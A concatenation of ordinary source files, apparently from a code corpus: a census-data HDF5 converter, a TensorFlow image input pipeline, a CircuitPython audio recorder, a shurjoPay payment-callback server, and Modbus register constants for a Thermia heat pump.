title_y = data_name+": Labels"
dtype_X = np.float32
atom_X = tables.Float32Atom()
dtype_y = np.uint8
atom_y = tables.UInt8Atom()
def parse_line(x, y):
## Inputs are a bit complicated.
x_out_list = []
for j in range(len(x)):
value = x[j]
attribute = attribute_names[j]
num_distinct = len(attribute_dict[attribute])
## Ignore all points with missing entries.
if value == "?":
return (None, None)
else:
if num_distinct > 1:
idx_hot = attribute_dict[attribute].index(value)
onehot = np.zeros(num_distinct, dtype=dtype_X)
onehot[idx_hot] = 1.0
x_out_list.append(onehot)
else:
x_out_list.append(np.array([value], dtype=dtype_X))
x_out = np.concatenate(x_out_list)
if len(x_out) != num_features:
raise ValueError("Something is wrong with the feature vec parser.")
## Labels are easy.
y_out = np.array([label_dict[y]], dtype=dtype_y)
return x_out, y_out
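# Illustrative sketch with a hypothetical record: categorical attributes are
# one-hot encoded and continuous ones pass through, so the feature vector
# always has length num_features and the label is mapped via label_dict.
_demo_x = ["39", "State-gov", "77516", "Bachelors", "13", "Never-married",
           "Adm-clerical", "Not-in-family", "White", "Male",
           "2174", "0", "40", "United-States"]
_demo_vec, _demo_lab = parse_line(_demo_x, "<=50K")
assert len(_demo_vec) == num_features and _demo_lab[0] == 0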
def raw_to_h5():
'''
Transform the raw dataset into one of HDF5 type.
'''
X_raw_tr = np.zeros((n_tr,num_features), dtype=dtype_X)
y_raw_tr = np.zeros((n_tr,num_labels), dtype=dtype_y)
X_raw_te = np.zeros((n_te,num_features), dtype=dtype_X)
y_raw_te = np.zeros((n_te,num_labels), dtype=dtype_y)
print("Preparation: {}".format(data_name))
## Read in the raw training data.
with open(toread_tr, newline="") as f_table:
print("Read {}.".format(toread_tr))
f_reader = csv.reader(f_table, delimiter=",",
skipinitialspace=True)
## Populate the placeholder numpy arrays.
idx = 0
for line in f_reader:
if len(line) == 0:
continue # do nothing for blank lines.
## Numpy arrays for individual instance.
x, y = parse_line(x=line[0:-1], y=line[-1])
if x is None:
continue # skip instances with missing values.
else:
X_raw_tr[idx,:] = x
y_raw_tr[idx,0] = y
## Update the index (also counts the clean data points).
idx += 1
## Check that number of *clean* instances is as expected.
print(
"Number of clean guys (tr): {}. Note n_tr = {}".format(idx,n_tr)
)
## Read in the raw test data.
with open(toread_te, newline="") as f_table:
print("Read {}.".format(toread_te))
f_reader = csv.reader(f_table, delimiter=",",
skipinitialspace=True)
## Populate the placeholder numpy arrays.
idx = 0
for i, line in enumerate(f_reader):
if i == 0:
continue # skip the first line, only for TEST data.
if len(line) == 0:
continue # do nothing for blank lines.
## Numpy arrays for individual instance.
x, y = parse_line(x=line[0:-1], y=line[-1][0:-1])
# Note: for test data, we strip the trailing "." from labels.
if x is None:
continue # skip instances with missing values.
else:
X_raw_te[idx,:] = x
y_raw_te[idx,0] = y
## Update the index (also counts the clean data points).
idx += 1
## Check that number of *clean* instances is as expected.
print(
"Number of clean guys (te): {}. Note n_te = {}".format(idx,n_te)
)
## Concatenate.
X_raw = np.vstack((X_raw_tr, X_raw_te))
y_raw = np.vstack((y_raw_tr, y_raw_te))
## Create and populate the HDF5 file.
makedir_safe(newdir)
with tables.open_file(towrite, mode="w", title=title) as myh5:
myh5.create_array(where=myh5.root,
name="X",
obj=X_raw,
atom=atom_X,
title=title_X)
myh5.create_array(where=myh5.root,
name="y",
obj=y_raw,
atom=atom_y,
title=title_y)
print(myh5)
print("Wrote {}.".format(towrite))
## Exit all context managers before returning.
print("Done ({}).".format(data_name))
return None
if __name__ == "__main__":
raw_to_h5()
###############################################################################
| 2.046875 | 2 |
| built-in/TensorFlow/Official/cv/image_classification/MobileNetV2_for_TensorFlow/00-access/dataloader/data_provider.py | Huawei-Ascend/modelzoo | 0 | 12775561 |
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions to read, decode and pre-process input data for the Model.
"""
import collections
import sys
import tensorflow as tf
from tensorflow.python.data.experimental.ops import threadpool
# from tensorflow.contrib import slim
InputEndpoints = collections.namedtuple(
'InputEndpoints', ['images', 'images_orig', 'labels', 'labels_one_hot'])
ShuffleBatchConfig = collections.namedtuple('ShuffleBatchConfig', [
'num_batching_threads', 'queue_capacity', 'min_after_dequeue'
])
DEFAULT_SHUFFLE_CONFIG = ShuffleBatchConfig(
num_batching_threads=8, queue_capacity=3000, min_after_dequeue=1000)
def get_data_files(data_sources):
from tensorflow.python.platform import gfile
if isinstance(data_sources, (list, tuple)):
data_files = []
for source in data_sources:
data_files += get_data_files(source)
else:
if '*' in data_sources or '?' in data_sources or '[' in data_sources:
data_files = gfile.Glob(data_sources)
else:
data_files = [data_sources]
if not data_files:
raise ValueError('No data files found in %s' % (data_sources,))
return data_files
def preprocess_image(image, location, label_one_hot, height=224, width=224):
"""Prepare one image for evaluation.
If height and width are specified it would output an image with that size by
applying resize_bilinear.
If central_fraction is specified it would crop the central fraction of the
input image.
Args:
image: 3-D Tensor of image. If dtype is tf.float32 then the range should be
[0, 1], otherwise it would be converted to tf.float32 assuming that the range
is [0, MAX], where MAX is largest positive representable number for
int(8/16/32) data type (see `tf.image.convert_image_dtype` for details)
height: integer
width: integer
central_fraction: Optional Float, fraction of the image to crop.
scope: Optional scope for name_scope.
Returns:
3-D float Tensor of prepared image.
"""
# if image.dtype != tf.float32:
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
# Crop the central region of the image with an area containing 87.5% of
# the original image.
# if central_fraction:
# image = tf.image.central_crop(image, central_fraction=central_fraction)
# if height and width:
# Resize the image to the specified height and width.
image = tf.expand_dims(image, 0)
image = tf.image.resize_bilinear(image, [height, width], align_corners=False)
image = tf.squeeze(image, [0])
# image = tf.cast(image, tf.float32)
# image = tf.multiply(image, 1/255.)
image = tf.subtract(image, 0.5)
image = tf.multiply(image, 2.0)
return image, location, label_one_hot
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def parse_example_proto(example_serialized, num_classes, labels_offset, image_preprocessing_fn):
feature_map = {
'image/encoded': tf.FixedLenFeature([], tf.string, ''),
'image/class/label': tf.FixedLenFeature([1], tf.int64, -1),
'image/class/text': tf.FixedLenFeature([], tf.string, ''),
'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/xmax': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymax': tf.VarLenFeature(dtype=tf.float32)
}
with tf.compat.v1.name_scope('deserialize_image_record'):
obj = tf.io.parse_single_example(serialized=example_serialized, features=feature_map)
image = tf.image.decode_jpeg(obj['image/encoded'], channels=3, fancy_upscaling=False,
dct_method='INTEGER_FAST')
if image_preprocessing_fn:
image = image_preprocessing_fn(image, 224, 224)
else:
image = tf.image.resize(image, [224, 224])
label = tf.cast(obj['image/class/label'], tf.int32)
label = tf.squeeze(label)
label -= labels_offset
label = tf.one_hot(label, num_classes - labels_offset)
return image, label
def parse_example_decode(example_serialized):
feature_map = {
'image/encoded': tf.FixedLenFeature([], tf.string, ''),
'image/class/label': tf.FixedLenFeature([1], tf.int64, -1),
'image/class/text': tf.FixedLenFeature([], tf.string, ''),
'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/xmax': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymax': tf.VarLenFeature(dtype=tf.float32)
}
with tf.compat.v1.name_scope('deserialize_image_record'):
obj = tf.io.parse_single_example(serialized=example_serialized, features=feature_map)
image = tf.image.decode_jpeg(obj['image/encoded'], channels=3, fancy_upscaling=False,
dct_method='INTEGER_FAST')
return image, obj['image/class/label']
def parse_example(image, label, num_classes, labels_offset, image_preprocessing_fn):
with tf.compat.v1.name_scope('deserialize_image_record'):
if image_preprocessing_fn:
image = image_preprocessing_fn(image, 224, 224)
else:
image = tf.image.resize(image, [224, 224])
label = tf.cast(label, tf.int32)
label = tf.squeeze(label)
label -= labels_offset
label = tf.one_hot(label, num_classes - labels_offset)
return image, label
def parse_example1(example_serialized, image_preprocessing_fn1):
feature_map = {
'image/encoded': tf.FixedLenFeature([], tf.string, ''),
'image/class/label': tf.FixedLenFeature([1], tf.int64, -1),
'image/class/text': tf.FixedLenFeature([], tf.string, ''),
'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/xmax': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymax': tf.VarLenFeature(dtype=tf.float32)
}
with tf.compat.v1.name_scope('deserialize_image_record'):
obj = tf.io.parse_single_example(serialized=example_serialized, features=feature_map)
image = tf.image.decode_jpeg(obj['image/encoded'], channels=3, fancy_upscaling=False,
dct_method='INTEGER_FAST')
image = image_preprocessing_fn1(image, 224, 224)
return image, obj['image/class/label']
def parse_example2(image, label, num_classes, labels_offset, image_preprocessing_fn2):
with tf.compat.v1.name_scope('deserialize_image_record'):
image = image_preprocessing_fn2(image, 224, 224)
label = tf.cast(label, tf.int32)
label = tf.squeeze(label)
label -= labels_offset
label = tf.one_hot(label, num_classes - labels_offset)
return image, label
def get_data(dataset, batch_size, num_classes, labels_offset, is_training,
preprocessing_name=None, use_grayscale=None, add_image_summaries=False):
return get_data_united(dataset, batch_size, num_classes, labels_offset, is_training,
preprocessing_name, use_grayscale, add_image_summaries)
def create_ds(data_sources, is_training):
data_files = get_data_files(data_sources)
ds = tf.data.Dataset.from_tensor_slices(data_files)
if is_training:
ds = ds.shuffle(1000)
# add for eval
else:
ds = ds.take(50000)
##### change #####
num_readers = 10
ds = ds.interleave(
tf.data.TFRecordDataset, cycle_length=num_readers, block_length=1, num_parallel_calls=tf.data.experimental.AUTOTUNE)
counter = tf.data.Dataset.range(sys.maxsize)
ds = tf.data.Dataset.zip((ds, counter))
##### change #####
if is_training:
ds = ds.repeat()
return ds
def get_data_united(dataset, batch_size, num_classes, labels_offset, is_training,
preprocessing_name=None, use_grayscale=None, add_image_summaries=False):
from preprocessing import preprocessing_factory
image_preprocessing_fn = preprocessing_factory.get_preprocessing(
name='inception_v2',
is_training=is_training,
use_grayscale=use_grayscale,
add_image_summaries=add_image_summaries
)
ds = create_ds(dataset.data_sources, is_training)
ds = ds.map(lambda example, counter: parse_example_proto(example, num_classes, labels_offset, image_preprocessing_fn), num_parallel_calls=24)
ds = ds.batch(batch_size, drop_remainder=True)
ds = ds.prefetch(buffer_size=tf.contrib.data.AUTOTUNE)
iterator = ds.make_initializable_iterator()
ds = threadpool.override_threadpool(ds,threadpool.PrivateThreadPool(128, display_name='input_pipeline_thread_pool'))
return iterator, ds
| 2.25 | 2 |
| record.py | Petroochio/audio-story-book | 0 | 12775562 |
import board
import audioio
import audiobusio
import digitalio
import time
import array
import math
buf = bytearray(16000)
print(3)
time.sleep(1)
print(2)
time.sleep(1)
print(1)
time.sleep(1)
#print("recording", time.monotonic())
print("recording")
#trigger = digitalio.DigitalInOut(board.A1)
#trigger.switch_to_output(value = True)
with audiobusio.PDMIn(board.MICROPHONE_CLOCK, board.MICROPHONE_DATA) as mic:
mic.record(buf, len(buf))
#trigger.value = False
#print("done recording", time.monotonic())
print("done recording")
speaker_enable = digitalio.DigitalInOut(board.SPEAKER_ENABLE)
speaker_enable.switch_to_output(value=True)
time.sleep(1)
#trigger.value = True
#print("playback", time.monotonic())
print("playback")
with audioio.AudioOut(board.SPEAKER, buf) as speaker:
speaker.frequency = 8000
speaker.play()
while speaker.playing:
pass
#trigger.value = False
| 3.03125 | 3 |
| src/shurjopay_v2/callbackHandler.py | shurjoPay-Plugins/python | 0 | 12775563 |
<reponame>shurjoPay-Plugins/python
from collections import namedtuple
from contextlib import closing
from io import BytesIO
from json import dumps as json_encode
import os
import sys
import requests
import json
import datetime
import logging
# Gets or creates a logger
logger = logging.getLogger(__name__)
# set log level
logger.setLevel(logging.DEBUG)
# define file handler and set formatter
log_fileName = 'LOGS/{:%Y-%m-%d}.log'.format(datetime.datetime.now())
os.makedirs(os.path.dirname(log_fileName), exist_ok=True)
file_handler = logging.FileHandler(log_fileName, mode="a", encoding=None,)
formatter = logging.Formatter('%(asctime)s : %(levelname)s : %(name)s : %(funcName)s %(message)s')
file_handler.setFormatter(formatter)
# add file handler to logger
logger.addHandler(file_handler)
if sys.version_info >= (3, 0):
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.parse import parse_qs
else:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
from urlparse import parse_qs
ResponseStatus = namedtuple("HTTPStatus",
["code", "message"])
ResponseData = namedtuple("ResponseData",
["status", "content_type", "data_stream"])
# Mapping the output format used in the client to the content type for the
# response
AUDIO_FORMATS = {"ogg_vorbis": "audio/ogg",
"mp3": "audio/mpeg",
"pcm": "audio/wave; codecs=1"}
CHUNK_SIZE = 1024
HTTP_STATUS = {"OK": ResponseStatus(code=200, message="OK"),
"BAD_REQUEST": ResponseStatus(code=400, message="Bad request"),
"NOT_FOUND": ResponseStatus(code=404, message="Not found"),
"INTERNAL_SERVER_ERROR": ResponseStatus(code=500, message="Internal server error")}
PROTOCOL = "http"
RETURN_URL = "/return"
CANCEL_URL = "/cancel"
class HTTPStatusError(Exception):
"""Exception wrapping a value from http.server.HTTPStatus"""
def __init__(self, status, description=None):
"""
Constructs an error instance from a tuple of
(code, message, description), see http.server.HTTPStatus
"""
super(HTTPStatusError, self).__init__()
self.code = status.code
self.message = status.message
self.explain = description
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""An HTTP Server that handle each request in a new thread"""
daemon_threads = True
class ChunkedHTTPRequestHandler(BaseHTTPRequestHandler):
""""HTTP 1.1 Chunked encoding request handler"""
# Use HTTP 1.1 as 1.0 doesn't support chunked encoding
protocol_version = "HTTP/1.1"
verification_token = ''
def query_get(self, queryData, key, default=""):
"""Helper for getting values from a pre-parsed query string"""
return queryData.get(key, [default])[0]
def do_HEAD(self):
self.send_headers()
def do_GET(self):
"""Handles GET requests"""
# Extract values from the query string
path, _, query_string = self.path.partition('?')
query = parse_qs(query_string)
response = None
print(u"[START]: Received GET for %s with query: %s" % (path, query))
try:
# Handle the possible request paths
if path == RETURN_URL:
response = self.route_return(path, query)
elif path == CANCEL_URL:
response = self.route_cancel(path, query)
else:
response = self.route_not_found(path, query)
self.send_headers(response.status, response.content_type)
# self.stream_data(response.data_stream)
logger.info(response)
self._json(response.data_stream)
except HTTPStatusError as err:
# Respond with an error and log debug
# information
if sys.version_info >= (3, 0):
self.send_error(err.code, err.message, err.explain)
else:
self.send_error(err.code, err.message)
self.log_error(u"%s %s %s - [%d] %s", self.client_address[0],
self.command, self.path, err.code, err.explain)
print("[END]")
def route_not_found(self, path, query):
"""Handles routing for unexpected paths"""
raise HTTPStatusError(HTTP_STATUS["NOT_FOUND"], "Page not found")
def route_return(self, path, query):
"""Handles routing for the application's entry point'"""
try:
_POST_DEFAULT_ADDRESS = "https://sandbox.shurjopayment.com"
_VERIFICATION_END_POINT = "/api/verification"
# print('here!', query['order_id'][0])
_headers = {'content-type': 'application/json', 'Authorization': f'Bearer {self.verification_token}'}
_payloads = {
"order_id": query['order_id'][0],
}
response = requests.post(_POST_DEFAULT_ADDRESS + _VERIFICATION_END_POINT, headers=_headers,
data=json.dumps(_payloads))
response_json = response.json()
return ResponseData(status=HTTP_STATUS["OK"], content_type="application/json",
# Open a binary stream for reading the index
# HTML file
data_stream=response_json)
except IOError as err:
# Couldn't open the stream
raise HTTPStatusError(HTTP_STATUS["INTERNAL_SERVER_ERROR"],
str(err))
def route_cancel(self, path, query):
"""Handles routing for the application's entry point'"""
try:
return ResponseData(status=HTTP_STATUS["OK"], content_type="application/json",
# Open a binary stream for reading the index
# HTML file
data_stream=open(os.path.join(sys.path[0],
path[1:]), "rb"))
except IOError as err:
# Couldn't open the stream
raise HTTPStatusError(HTTP_STATUS["INTERNAL_SERVER_ERROR"],
str(err))
def send_headers(self, status, content_type):
"""Send out the group of headers for a successful request"""
# Send HTTP headers
self.send_response(status.code, status.message)
self.send_header('Content-type', content_type)
# self.send_header('Transfer-Encoding', 'chunked')
# self.send_header('Connection', 'close')
self.send_header('Access-Control-Allow-Origin', '*')
self.end_headers()
def _html(self, message):
"""This just generates an HTML document that includes `message`
in the body. Override, or re-write this to do more interesting stuff.
"""
content = f"<html><body><h1>{message}</h1></body></html>"
return content.encode("utf8") # NOTE: must return a bytes object!
def _json(self, response):
str = json_encode(response)
self.wfile.write(str.encode("utf8"))
def stream_data(self, stream):
"""Consumes a stream in chunks to produce the response's output'"""
print("Streaming started...")
if stream:
# Note: Closing the stream is important as the service throttles on
# the number of parallel connections. Here we are using
# contextlib.closing to ensure the close method of the stream object
# will be called automatically at the end of the with statement's
# scope.
# with closing(stream) as managed_stream:
# Push out the stream's content in chunks
while True:
# data = managed_stream.read(CHUNK_SIZE)
data = stream
self.wfile.write(self._html(data))
# If there's no more data to read, stop streaming
if not data:
break
# Ensure any buffered output has been transmitted and close the
# stream
self.wfile.flush()
print("Streaming completed.")
else:
# The stream passed in is empty
self.wfile.write(b"0\r\n\r\n")
print("Nothing to stream.")
def wait_for_request(host, port, token):
# Create and configure the HTTP server instance
handler = ChunkedHTTPRequestHandler
handler.verification_token = token
server = ThreadedHTTPServer((host, port),
handler)
print("Starting server, use <Ctrl-C> to stop...")
print(u"Open {0}://{1}:{2} in a web browser.".format(PROTOCOL,
host,
port,
))
try:
# Listen for requests indefinitely
server.handle_request()
except KeyboardInterrupt:
# A request to terminate has been received, stop the server
print("\nShutting down...")
server.socket.close()
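# Illustrative sketch (hypothetical host, port and token): serve a single
# /return or /cancel callback on localhost:8080; the handler then verifies the
# order against the sandbox endpoint using the supplied bearer token.
if __name__ == "__main__":
    wait_for_request("localhost", 8080, "demo-verification-token")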
| 2.140625 | 2 |
| pythermiagenesis/const.py | CJNE/pythermiagenesis | 5 | 12775564 |
<filename>pythermiagenesis/const.py
"""Constants for ThermiaGenesis integration."""
KEY_ATTRIBUTES = 'attributes'
KEY_ADDRESS = 'address'
KEY_RANGES = 'ranges'
KEY_SCALE = 'scale'
KEY_REG_TYPE = 'register_type'
KEY_BITS = 'bits'
KEY_DATATYPE = 'datatype'
TYPE_BIT = 'bit'
TYPE_INT = 'int'
TYPE_UINT = 'uint'
TYPE_LONG = 'long'
TYPE_STATUS = 'status'
REG_COIL = 'coil'
REG_DISCRETE_INPUT = 'dinput'
REG_INPUT = 'input'
REG_HOLDING = 'holding'
REG_TYPES = [REG_COIL, REG_DISCRETE_INPUT, REG_INPUT, REG_HOLDING]
DOMAIN = "thermiagenesis"
MODEL_MEGA = 'mega'
MODEL_INVERTER = 'inverter'
REGISTER_RANGES = {
MODEL_MEGA: {
REG_COIL: [[3, 28],[28, 59]],
REG_DISCRETE_INPUT: [[0,3], [9, 83], [199, 247]],
REG_INPUT: [[0, 100], [100, 174]],
REG_HOLDING: [[0, 115], [116,116], [199, 217], [239, 257], [299, 321]],
},
MODEL_INVERTER: {
#REG_COIL: [[3, 22],[23, 41]],
#REG_DISCRETE_INPUT: [[0,3], [9, 45], [46, 83], [199, 247]],
#REG_INPUT: [[0, 50], [51, 100], [100, 174]],
#REG_HOLDING: [[0, 29], [30, 58], [59, 87], [88, 116], [199, 217], [239, 257], [299, 305]],
REG_COIL: [[3, 41]],
REG_DISCRETE_INPUT: [[0,3], [9, 45], [46, 83], [199, 247]],
REG_INPUT: [[0, 174]],
REG_HOLDING: [[0, 115],[116,116],[199, 217], [239, 257], [299, 305]],
}
}
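# Illustrative sketch (assumes the [start, end] bounds above are inclusive):
# how many registers each block of the mega model covers.
_MEGA_REGISTER_COUNTS = {
    reg_type: sum(end - start + 1 for start, end in ranges)
    for reg_type, ranges in REGISTER_RANGES[MODEL_MEGA].items()
}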
ATTR_COIL_RESET_ALL_ALARMS = "coil_reset_all_alarms"
ATTR_COIL_ENABLE_INTERNAL_ADDITIONAL_HEATER = "coil_enable_internal_additional_heater"
ATTR_COIL_ENABLE_EXTERNAL_ADDITIONAL_HEATER = "coil_enable_external_additional_heater"
ATTR_COIL_ENABLE_HGW = "coil_enable_hgw"
ATTR_COIL_ENABLE_FLOW_SWITCH_PRESSURE_SWITCH = "coil_enable_flow_switch_pressure_switch"
ATTR_COIL_ENABLE_TAP_WATER = "coil_enable_tap_water"
ATTR_COIL_ENABLE_HEAT = "coil_enable_heat"
ATTR_COIL_ENABLE_ACTIVE_COOLING = "coil_enable_active_cooling"
ATTR_COIL_ENABLE_MIX_VALVE_1 = "coil_enable_mix_valve_1"
ATTR_COIL_ENABLE_TWC = "coil_enable_twc"
ATTR_COIL_ENABLE_WCS = "coil_enable_wcs"
ATTR_COIL_ENABLE_HOT_GAS_PUMP = "coil_enable_hot_gas_pump"
ATTR_COIL_ENABLE_MIX_VALVE_2 = "coil_enable_mix_valve_2"
ATTR_COIL_ENABLE_MIX_VALVE_3 = "coil_enable_mix_valve_3"
ATTR_COIL_ENABLE_MIX_VALVE_4 = "coil_enable_mix_valve_4"
ATTR_COIL_ENABLE_MIX_VALVE_5 = "coil_enable_mix_valve_5"
ATTR_COIL_ENABLE_BRINE_OUT_MONITORING = "coil_enable_brine_out_monitoring"
ATTR_COIL_ENABLE_BRINE_PUMP_CONTINUOUS_OPERATION = "coil_enable_brine_pump_continuous_operation"
ATTR_COIL_ENABLE_SYSTEM_CIRCULATION_PUMP = "coil_enable_system_circulation_pump"
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION = "coil_enable_dew_point_calculation"
ATTR_COIL_ENABLE_ANTI_LEGIONELLA = "coil_enable_anti_legionella"
ATTR_COIL_ENABLE_ADDITIONAL_HEATER_ONLY = "coil_enable_additional_heater_only"
ATTR_COIL_ENABLE_CURRENT_LIMITATION = "coil_enable_current_limitation"
ATTR_COIL_ENABLE_POOL = "coil_enable_pool"
ATTR_COIL_ENABLE_SURPLUS_HEAT_CHILLER = "coil_enable_surplus_heat_chiller"
ATTR_COIL_ENABLE_SURPLUS_HEAT_BOREHOLE = "coil_enable_surplus_heat_borehole"
ATTR_COIL_ENABLE_EXTERNAL_ADDITIONAL_HEATER_FOR_POOL = "coil_enable_external_additional_heater_for_pool"
ATTR_COIL_ENABLE_INTERNAL_ADDITIONAL_HEATER_FOR_POOL = "coil_enable_internal_additional_heater_for_pool"
ATTR_COIL_ENABLE_PASSIVE_COOLING = "coil_enable_passive_cooling"
ATTR_COIL_ENABLE_VARIABLE_SPEED_MODE_FOR_CONDENSER_PUMP = "coil_enable_variable_speed_mode_for_condenser_pump"
ATTR_COIL_ENABLE_VARIABLE_SPEED_MODE_FOR_BRINE_PUMP = "coil_enable_variable_speed_mode_for_brine_pump"
ATTR_COIL_ENABLE_COOLING_MODE_FOR_MIXING_VALVE_1 = "coil_enable_cooling_mode_for_mixing_valve_1"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_1 = "coil_enable_outdoor_temp_dependent_for_cooling_with_mixing_valve_1"
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_1 = "coil_enable_internal_brine_pump_to_start_when_cooling_is_active_for_mixing_valve_1"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_EXTERNAL_HEATER = "coil_enable_outdoor_temp_dependent_for_external_heater"
ATTR_COIL_ENABLE_BRINE_IN_MONITORING = "coil_enable_brine_in_monitoring"
ATTR_COIL_ENABLE_FIXED_SYSTEM_SUPPLY_SET_POINT = "coil_enable_fixed_system_supply_set_point"
ATTR_COIL_ENABLE_EVAPORATOR_FREEZE_PROTECTION = "coil_enable_evaporator_freeze_protection"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_2 = "coil_enable_outdoor_temp_dependent_for_cooling_with_mixing_valve_2"
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_2 = "coil_enable_dew_point_calculation_on_mixing_valve_2"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_2 = "coil_enable_outdoor_temp_dependent_for_heating_with_mixing_valve_2"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_3 = "coil_enable_outdoor_temp_dependent_for_cooling_with_mixing_valve_3"
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_3 = "coil_enable_dew_point_calculation_on_mixing_valve_3"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_3 = "coil_enable_outdoor_temp_dependent_for_heating_with_mixing_valve_3"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_4 = "coil_enable_outdoor_temp_dependent_for_cooling_with_mixing_valve_4"
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_4 = "coil_enable_dew_point_calculation_on_mixing_valve_4"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_4 = "coil_enable_outdoor_temp_dependent_for_heating_with_mixing_valve_4"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_5 = "coil_enable_outdoor_temp_dependent_for_cooling_with_mixing_valve_5"
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_5 = "coil_enable_dew_point_calculation_on_mixing_valve_5"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_5 = "coil_enable_outdoor_temp_dependent_for_heating_with_mixing_valve_5"
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_2 = "coil_enable_internal_brine_pump_to_start_when_cooling_is_active_for_mixing_valve_2"
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_3 = "coil_enable_internal_brine_pump_to_start_when_cooling_is_active_for_mixing_valve_3"
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_4 = "coil_enable_internal_brine_pump_to_start_when_cooling_is_active_for_mixing_valve_4"
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_5 = "coil_enable_internal_brine_pump_to_start_when_cooling_is_active_for_mixing_valve_5"
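
# Attribute name constants for Modbus discrete inputs (read-only status and
# alarm bits reported by the heat pump).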
ATTR_DINPUT_ALARM_ACTIVE_CLASS_A = "dinput_alarm_active_class_a"
ATTR_DINPUT_ALARM_ACTIVE_CLASS_B = "dinput_alarm_active_class_b"
ATTR_DINPUT_ALARM_ACTIVE_CLASS_C = "dinput_alarm_active_class_c"
ATTR_DINPUT_ALARM_ACTIVE_CLASS_D = "dinput_alarm_active_class_d"
ATTR_DINPUT_ALARM_ACTIVE_CLASS_E = "dinput_alarm_active_class_e"
ATTR_DINPUT_HIGH_PRESSURE_SWITCH_ALARM = "dinput_high_pressure_switch_alarm"
ATTR_DINPUT_LOW_PRESSURE_LEVEL_ALARM = "dinput_low_pressure_level_alarm"
ATTR_DINPUT_HIGH_DISCHARGE_PIPE_TEMPERATURE_ALARM = "dinput_high_discharge_pipe_temperature_alarm"
ATTR_DINPUT_OPERATING_PRESSURE_LIMIT_INDICATION = "dinput_operating_pressure_limit_indication"
ATTR_DINPUT_DISCHARGE_PIPE_SENSOR_ALARM = "dinput_discharge_pipe_sensor_alarm"
ATTR_DINPUT_LIQUID_LINE_SENSOR_ALARM = "dinput_liquid_line_sensor_alarm"
ATTR_DINPUT_SUCTION_GAS_SENSOR_ALARM = "dinput_suction_gas_sensor_alarm"
ATTR_DINPUT_FLOW_PRESSURE_SWITCH_ALARM = "dinput_flow_pressure_switch_alarm"
ATTR_DINPUT_POWER_INPUT_PHASE_DETECTION_ALARM = "dinput_power_input_phase_detection_alarm"
ATTR_DINPUT_INVERTER_UNIT_ALARM = "dinput_inverter_unit_alarm"
ATTR_DINPUT_SYSTEM_SUPPLY_LOW_TEMPERATURE_ALARM = "dinput_system_supply_low_temperature_alarm"
ATTR_DINPUT_COMPRESSOR_LOW_SPEED_ALARM = "dinput_compressor_low_speed_alarm"
ATTR_DINPUT_LOW_SUPER_HEAT_ALARM = "dinput_low_super_heat_alarm"
ATTR_DINPUT_PRESSURE_RATIO_OUT_OF_RANGE_ALARM = "dinput_pressure_ratio_out_of_range_alarm"
ATTR_DINPUT_COMPRESSOR_PRESSURE_OUTSIDE_ENVELOPE_ALARM = "dinput_compressor_pressure_outside_envelope_alarm"
ATTR_DINPUT_BRINE_TEMPERATURE_OUT_OF_RANGE_ALARM = "dinput_brine_temperature_out_of_range_alarm"
